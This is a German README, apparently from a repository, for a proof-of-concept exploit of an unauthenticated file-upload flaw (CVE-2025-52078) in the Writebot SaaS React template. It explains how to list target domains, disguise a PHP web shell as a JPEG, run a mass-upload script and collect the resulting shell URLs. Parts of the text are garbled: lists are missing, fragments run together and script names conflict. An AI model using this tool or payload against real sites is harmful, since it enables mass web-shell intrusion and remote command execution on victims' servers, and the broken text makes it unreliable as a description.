
CVE-2025-52078 - Nicht authentifiziertes Hochladen beliebiger Dateien - Writebot SaaS React Template
Dieses Repository enthält einen Proof-of-Concept-Exploit für eine Unauthentifizierte Schwachstelle für beliebigen Datei-Upload (Arbitrary File Upload), die in der Writebot – AI Content Generator SaaS React Template gefunden wurde.
🧠 Produktseite:
ThemeForest – Writebot
Die Vorlage stellt einen Datei-Upload-Endpunkt bereit unter:
POST /file-upload
Aufgrund des Fehlens von:
Kann ein Angreifer eine als Bild getarnte schädliche PHP-Datei hochladen und beliebige Befehle ausführen, sobald sie in ein öffentlich zugängliches Verzeichnis geschrieben wurde.
<meta name="csrf-token">bq.php-Shell hoch, getarnt als image/jpegresult.txtrequestsbeautifulsoup4Module installieren:
pip install requests beautifulsoup4
writebot.py # Main exploit script
list.txt # Domains
bq.php # Payload disguised as JPEG
result.txt # Shell URLs on success
Trage die Zieldomänen in list.txt ein:
test-web-dummy-site.ai
vulnerable.site
Stelle sicher, dass bq.php dieses Format enthält:
ÿØÿà
<?php
// Your code
?>
Führe den Exploit aus:
python3 mass_uploader.py
Shell-URLs werden in result.txt gespeichert.
Zur Abschwächung:
Dieses Projekt dient ausschließlich Bildungs- und autorisierten Testzwecken.
Die unbefugte Verwendung gegen Websites, die du nicht besitzt oder für die du keine Testberechtigung hast, ist illegal und unethisch.